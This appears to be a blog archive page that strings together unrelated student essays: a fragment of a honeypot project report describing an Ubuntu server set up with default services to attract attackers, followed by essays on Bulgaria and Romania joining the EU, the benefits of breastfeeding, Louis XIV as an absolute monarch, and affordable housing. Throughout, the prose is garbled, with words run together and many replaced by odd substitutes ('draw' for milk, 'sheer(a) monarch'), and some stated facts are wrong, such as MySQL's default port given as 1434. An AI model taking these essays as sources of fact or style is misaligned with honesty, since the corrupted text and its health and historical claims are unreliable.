honeypots)SebekSebek 3.2.0Honeynet Project Online TenureNovember 12, 2009 TO December 12, 20093.1 Deployed Architecture and Design3.2 Windows Server 2003 as Host OSUsability and performance of virtualization softwares are very good on windows server 2003. Windows Server 2003is aserveroperating system produced byMicrosoft. it is considered by Microsoft to be the cornerstone of itsWindows Server Syst emline of business server products. Windows Server 2003 is more scalable and delivers better performance than its predecessor,Windows 2000.3.3 Ubuntu as HoneypotDetermined to use free and open source software for this project, Linux was the natural choice to fill as the Host Operating System for our projects server. Ubuntu 8.04 was used as a linux based honeypot for our implementation. The concept was to setup an up-to-date Ubuntu server, cond with commonly used services such as SSH, FTP, Apache, MySQL and PHP and study attacks directed towards them on the internet. Ubuntu being the most widely used Linux desktop can prove to be a good platform to study zero day exploits. It also becomes a candidate for malware collection and a source to learn hacker tools being used on the internet. Ubuntu was successfully deployed as a virtual machine and setup in our honeynet with a host-only virtual Ethernet connection. The honeypot was made sweeter i.e. an interesting target for the attacker by setting up all services with default settings, for example SSH allowed password based connectivity from any IP on default port 22, users created were given privileges to install and run applications, Apache index.html page was made remotely accessible with default errors and banners, MySQL default port 1434 was accessible and outbound connections were allowed but limited 3.Ubuntu is a computeroperating systembased on theDebianGNU/Linux distribution. It is named after theSouthern Africanethical ideology Ubuntu (humanity towards others)5and is distributed asfree and open source software. Ubuntu provides an up-to-date, stable operating system for the average user, with a strong focus onusabilityand ease of installation. Ubuntu focuses onusability andsecurity. The Ubiquity installer allows Ubuntu to be installed to the hard disk from within the Live CD environment, without the need for restarting the computer prior to installation. Ubuntu also emphasizesaccessibilityandinternationaliza tion to reach as many people as possible 33.Ubuntu comes installed with a wide range of software that includes OpenOffice, Firefox,Empathy (Pidgin in versions before 9.10), Transmission, GIMP, and several lightweight games (such as Sudoku and chess). Ubuntu allows networking ports to be closed using its firewall, with customized port selectio
Tuesday, June 4, 2019
Why Were Bulgaria and Romania Accepted in the EU?
Why Were Bulgaria and Romania Accepted in the EU?Why were Bulgaria and Romania received in the EU in 2007 despite of their incomplete democratisation, which was hold by the European Commission?IntroductionOn December 2007 Romania and Bulgaria joined the European Union. They had not been able to join in the 2004 EU expansion as they had failed to meet the EUs criteria for membership at the time. In 2007 however there still existed serious doubts as to whether Romania or Bulgaria would be able to join. Although two were democracies both(prenominal)(prenominal) nations still had major policy-making issues relating to corruption, government accountability and their incomplete democratisation process. Why then, if the EU acknowledged that both Countries still had serious problems, were these nations accepted into the EU? This Essay will look at the circumstances leading up to Bulgaria and Romanias entry into the EU, examine wherefore many believed they were not mark for membershi p and the reasons behind their acceptance by Brussels.Background to MembershipIn 2004 eight Eastern European Countries were admitted into the EU. Both Bulgaria and Romania were turned down for liberal membership of the EU at this point, due to their being significantly behind the other eight nations in terms of GDP, democratisation and other factors.1 However both nations before long went from being candidates to being accession Countries in April 2005, as long as both nations overcompensated to ordinate the necessary square aways, and in September 2006 it was confirmed that both would become full members on January 2007.2 In many ways then the final decision regarding Romanian and Bulgarian membership was not made in January 2007, but arguably as early as 2005, which then made it inevitable. Throughout this period, there were serious doubts about the Eastern European Nations ability and willingness to enact the necessary reforms, and even upon entry the EU acknowledged that th ere was still much work to be done.Democratic DeficienciesThe 2004 Romanian election was said by many commentators to be proof that the Country had not unless made the transition to fully fledged democracy. There were allegations of voter irregularities, missing votes and candidates with link to the prior security apparatus of the Country. 3 Both nations political systems still had aspects of authoritarian regimes, and a year after membership both were still unable to fully check their citizens constitutional rights. Romania and Bulgarias legal systems were considered by many as incompatible with a free and democratic society.4 In economic terms the two ex communist nations were extremely poor, with a GDP around just 30% of the EU average. At the time of the accession process both markets had not yet made the transition into being free market economies, infrastructure was ageing and the State still had a large role in both Nations economies. The or so significant problem howeve r was the widespread corruption in the States, especially with regards to Bulgaria. The EU consistently complained about Bulgarian organised crimes links with high level Bulgarian Government officials, who have often been found siphoning EU grants meant for infrastructure to family businesses or to criminal gangs. Such is the level of corruption that the EU saw fit to withhold 486 million Euros worth of aid in 2008.5Reasons for MembershipTaking into account the serious problems, poverty, corruption and lack of accountability of Romania and Bulgaria, why did the EU allow them membership in January 2007? As we have already mentioned, the decision to accept Romania and Bulgaria as members was taken long before 2007. Although they were rejected as full members in 2004, from their acceptance as accession Countries in 2005 it was clear that they were on the path to full membership. The EU did place stringent conditions on full membership, to which it is debatable the pair have achieved. T he EU did judge in 2006 that both Countries, although having a lot of work to do, had satisfied the criteria. Both Romania and Bulgaria had, since 2004 reformed their legislative systems, economies and political processes.6 From this point on, although the EU could delay membership, it could not feasibly deny membership to the two unless there was some major breach of democratic and human rights norms.Membership as a means to ReformAlong with the legal arguments, Brussels clearly believed that to deny membership when the nations had clearly made profound transitional steps to reform would not only be unfair but damaging to the EU, Romania and Bulgaria. The EU believed that membership would act as a motivating factor for both nations to continue reforms, whereas rejection might well have convinced the elites of both nations to continue their corrupt and undemocratic practices. The obvious financial and political benefits that come with membership, have, as predicted by the EU, helped both nations start the economic reforms needed.7 This essay believes that the reason Romania and Bulgaria were accepted was because the EU believed that only membership would help the Countries to successfully integrate into Europe, and that despite several problems regarding corruption and accountability, the EU was satisfied with both the existing reforms and pledges that the two nations would in future continue to meet EU expectations and demands if they were allowed membership in 2007.BibliographyBagehot, Europe Balkan Blushes Bulgaria, Romania and the EU (The Economist, London July 26, 2008, Vol 388, start 8590Ciobanu, Monica Romanias travails with democracy and accession to the European Union Europe-Asia Studies, 59.8, pp1429-1450Pridham, Geoffrey The Scope and Limitations of Political Conditionality Romanias Accession to the European Union (Comparative European Politics, Houndsmills, Dec 2007, Vol 5, Issue 4, pp347-367)Sangiovanni, Mette Eilstrup Debates on European Integra tion (Palgrave Macmillan, New York, 2006)WebsiteBBC News EU approves Bulgaria and Romania 26/09/2006 accessed 10/12/2008http//news.bbc.co.uk/1/hi/world/europe/5380024.stm1Footnotes1 Sangiovanni, Mette Eilstrup Debates on European Integration (Palgrave Macmillan, New York, 2006, p.125)2 Pridham, Geoffrey The Scope and Limitations of Political Conditionality Romanias Accession to the European Union (Comparative European Politics, Houndsmills, Dec 2007, Vol 5, Issue 4, pp347-367)3 Ciobanu, Monica Romanias travails with democracy and accession to the European Union Europe-Asia Studies, 59.8, p14444 Pridham, Geoffrey The Scope and Limitations of Political Conditionality Romanias Accession to the European Union (Comparative European Politics, Houndsmills, Dec 2007, Vol 5, Issue 4, pp347-367)5 Bagehot, Europe Balkan Blushes Bulgaria, Romania and the EU (The Economist, London July 26, 2008, Vol 388, Issue 85906 Ciobanu, Monica Romanias travails with democracy and accession to the Europea n Union Europe-Asia Studies, 59.8, pp1429-14507 Bagehot, Europe Balkan Blushes Bulgaria, Romania and the EU (The Economist, London July 26, 2008, Vol 388, Issue 8590
Monday, June 3, 2019
The Benefits Of Breastfeeding
The Benefits Of Breast scarperingHuman draw is uniquely engineered for pitying infants, and is the biologically or natural way to feed infants. Breastfeeding, in comparison to feeding breast draw substitutes much(prenominal) as infant formula, has numerous health benefits. It not only has benefits on children and mothers entirely the troupe and economy as well.IntroductionOne of the roughly useful and natural steps a mother can take for her children is to breastfeed them. Science has turn up remarkable health benefits of breast milk that ar passed from mothers to their children. The benefits, from the building of antibodies to protect a new-sprung(prenominal)born at birth to the special nutrients to prevent numerous infancy infections, ar countless. No other sole step taken by a mother can so drastically impact the present and prox wellbeing of her newborn baby. Breast milk not only benefits the newborn baby, it also benefits the mother, the society and the surrounding s. In this paper the benefits of breastfeeding for both infants as well as mothers pass on be stated. Also, I will talk about its benefits to the environment and society. Finally, I will discuss what the United Arab Emirates does in terms of breastfeeding.The benefits of breastfeeding for InfantsNutritional benefitsBreast milk is a unique nutritional source that cannot adequately be replaced by any other food. It is ultimately the best source of nutrition for a new baby. Many components in breast milk help protect infants against infection and disorder. It contains the perfect combination of proteins, fats, vitamins, and carbohydrates. The proteins in breast milk are more intimately digested than in formula or cows milk. The calcium and iron in breast milk are also more easily absorbed. Also, in it are Leukocytes which are living cells that are only found in breast milk. They help fight infection. It is the antibodies, living cells, enzymes, and hormones that make breast milk the perfect filling (Brown, 2008).Immunological benefitsMost preemies are at risk for infections that can sometimes be very serious, so immune system benefits are some of the most important benefits of breastfeeding a premature baby can have. Human milk has the ability to protect them against infections and serious diseases. It is protects the infants against serious Infections like Diarrhea and Haemophilus Influenza. Children who are on breast feed experience a lower rate of severe diarrheal disease than children that are given formula milk. In a have conducted on a controlled group of infants (age bracket of less than 6 months), it was observed that newborns on breast feed were noticeably protected against haemophilus influenza, type B disease (Cochi, 1986).Evidence suggests that breast milk can carry particular or non-particular immunities to the newborns respiratory tract which is extremely important in the spikely days after(prenominal) birth when their immune system is not fu lly developed. Mothers milk protects the newborn babies against respiratory problems like, breathlessness, wheezing and other infections related to the respiratory tract in the initial four months of their life. Children who are given formula milk experience increased risk for, respiratory problems, severe otitis media along with extended duration of middle ear infections due to immature immune system. Breast milk as well plays a vital role in protecting the infants from the infection of Herpes simplex virus II. It was also confirmed that breastfeeding babies were less likely to die from SIDS (Sudden Infant Death Syndrome), the reason being the prevention of respiratory and gastrointestinal infections due to strong immunity developed in them because of breast milk (Allen Hector, 2005).To sum up, all these findings of different studies strongly indicate that mothers milk develops and enhances the immune system of the newborn babies especially in the very initial years of their life .Cognitive benefitsIn addition to the nutritional and immunological benefits of breast milk, breastfeeding may help preemies get up intellectually. Breast milk is associated with increases in child cognitive ability and educational achievements. Cognitive development of social and psychomotor skills gains increases with the consumption and duration of breastfeeding. According to Horwood and Fergusson such effects are relatively long lived extending not only throughout childhood but also into young adulthood (1998). Children who consume human milk in early days of their life have a prodigious higher level of IQ at the age bracket of seven and cardinal than those kids who did not get their mothers milk (Erterm, 2001). In fact, studies suggest that nutrients present in breast milk may have a significant effect on neurologic development in premature and term infants. Breastfeeding is associated with a 3.16-point higher score for cognitive development compared with formula feeding aft er adjustment for significant covariates (Anderson et al, 1999)*.Health Benefits to Moms Who BreastfeedThe babies are not the only ones who benefit from breastfeeding. Moms also benefit from breastfeeding their premature babies. Breastfeeding not only reduces the risk of breast cancer but also plays a role in preventing endometrial, ovarian and cervical cancers. It reduces the risk of anemia and Protects against health issue related to bones like osteoporosis and hip fractures by and by in life (Heacock, 1992). It also greatly helps the body of the pregnant women to return to its earlier shape faster, helps in losing the extra weight during pregnancy and also plays a very important role in the contraction of the uterus after delivery to control postpartum bleeding. The fat stores of the body are consumed to produce human milk which can easily burn from five hundred to fifteen hundred calories every day. Breastfeeding the babies also delay the return of fertility and thus lead a na tural gap between subsequent pregnancies. It also develops a special bonding and emotional relationship between the mother and the baby (Brown, 2008 Dimes Foundation, 2010).Benefits to the environment and the SocietyBreastfeeding also has economic advantages its cheaper than buying formula and helps avoid medical bills later because it helps equip the baby to fight off disease and infection. According to the Unicef fiscal benefits is associated with breastfeeding. Higher breastfeeding initiation and duration rates would significantly improve the health of a nation. Breastfeeding babies and their mothers are at lower risk of certain illnesses. There are therefore potential cost savings for the wider health care system (2006). In fact, it reduces both direct costs such as clinical or hospital fees and indirect costs such as formula costs (Weimer, 2001). Thus, breastfeeding is also linked to the environment. Breastfeeding the young ones decreases the use of raw material, energy and ot her resources demand in the manufacturing, packing, distributing, promoting and disposing of waste materials of formula milk which ultimately reduces global pollution (Lance, 2007).Breastfeeding in United Arab EmiratesConclusionIt is concluded that not a single instigant of formula milk can replace the properties and nutrients of breast milk, regardless of the addition of vitamins, supplements and minerals it is and will essentially stay a chemical formulation. Human milk has nutritional, immunological, and developmental benefits for the child, as well as physiological and emotional benefits for the mother. It also holds several benefits for the environment and society. The United Arab Emirates
Sunday, June 2, 2019
The Most Successful Absolute Monarch in Europe was Louis XIV of France
Of completely the secure rulers in Europe, by far the best example of one, and the most powerful, was Louis XIV of France. Although Louis had some failures, he excessively had many successes. He controlled Frances money and had many different ways to get, as well as keep his power, and he knew how to delegate jobs to smart, but faithful people. According to the text book, an sheer(a) monarch is a king or queen who has unlimited power and seeks to control all aspects of society (McDougall little, 1045). In more(prenominal) simple terms, it is a ruler who can do just about anything without having to get permission from anyone, or having to worry about the repercussions. This was a trend that started in the 1600s by European leaders who were rich, and didnt like to be told what to do. These conflicts arose with the States-General in France, or Parliament in England who had substantial control. The first countries to have absolute rulers were the traditionally strong countrie s, such as England, Spain, and of course Louis XIVs France. In order to gain the power he desired as an absolute monarch, Louis used a few key techniques that were very successful. His first and most necessary step to get all control was to take all of the nobles power, and move over it so they were completely under his control. He first did this by taking the nobles positions of power, and either getting rid of them by doing it himself, or giving the jobs to loyal middleclass or some nobles who were completely loyal and under his control. Louis had very simple reasoning for doing this, which was that if the nobles had any power or control, they would have a better chance of overthrowing him, and that since at that place can only be so much total power, the more they had, the less ... ...s was from a military stand point, which was rare for him. In 1667, Louis attacked a specify of the Netherlands that was owned by the Spanish. This resulted in the gaining of 12 towns, whic h encouraged Louis to attack the Dutch Netherlands, which did gain him a few wealthy port towns, before ending in disaster. Louis last great success was the building of the Palace of Versailles, which as described earlier was a feat never before matched by a ruler. Of all the absolute rulers in European history, Louis XIV of France was the most powerful, and the best example because of his successes, being able to continue his complete control even after failures, his dexterity to be able to use Frances money in any way he wanted, such as the Place of Versailles, taking away the nobles power, and his might to delegate impotant jobs to smart yet loyal people.
Saturday, June 1, 2019
America Needs Affordable Housing Essay -- Exploratory Essays Research
America Needs Affordable Housing It is often easy to temper large cities or third world countries as failures in the field of affordable hold, yet the crisis, like an invisible cancer, manifests itself in many forms, plaguing both urban and suburban areas. Reformers have wrestled passionately with the issue for centuries, revealing the severity of the situation in an attempt for change, while politicians have only responded with band aid solutions. Unfortunately, the housing crisis easily fades from our memory, replaced by visions of homeless vets, or starving children. Metropolis magazine explains that though billions of dollars are spent each year on housing and victimisation programs worldwide, ? At least 1 billion people lack adequate housing some 100 million have none at all.? In an attempt to correct this worldwide dilemma, a United Nations conference, Habitat II, was held in Istanbul, Turkey in June of 1996. This conference was open not only to government leaders, besides also to community organizers, non governmental organizations, architects and planners. By the year 2000, half the worlds people will live in cities. By the year 2025, 2 thirds of the world population will be urban dwellers ? Globally, one million people move from the countryside to the city each week.? Martin Johnson, a community organizer and Princeton professor who attended Habitat II, definitively put into words the focus of the deliberations. Cities, which are currently plagued with several of the severe problems of dis-investment ?crime, violence, lack of jobs and inequality ?and more importantly, a lack of affordable and decent housing, quickly appeared in the forefront of the agenda. The dis-investment is present in many large citie... ...ary 1997 66+Johnson, Martin. United Nations Habitat II Conference in Instanbul, Turkey,?The Advocate, declination 1996 2+ Outline I. Introduction A. International situation 1. Habitat II conference in Istanbul a. Article written in Metr opolis magazine b. ad hominem account by community organizer II. Body A. Bergen county 1. HUD statistics for county 2. Studies shown in graphs, charts, tables 3. Maps showing minority, unemployed, and low income areas a. This is to draw a possible conclusion of course b. Statistics show self-command housing problems B. NYC situation 1. Less statistics, more stories and examples a. Drawing from NYT article 8 part series III. Conclusion(s) A. Are there relationships of race housing? B. Is the government drag its weight? C. Are there solutions at hand?
Subscribe to:
Comments (Atom)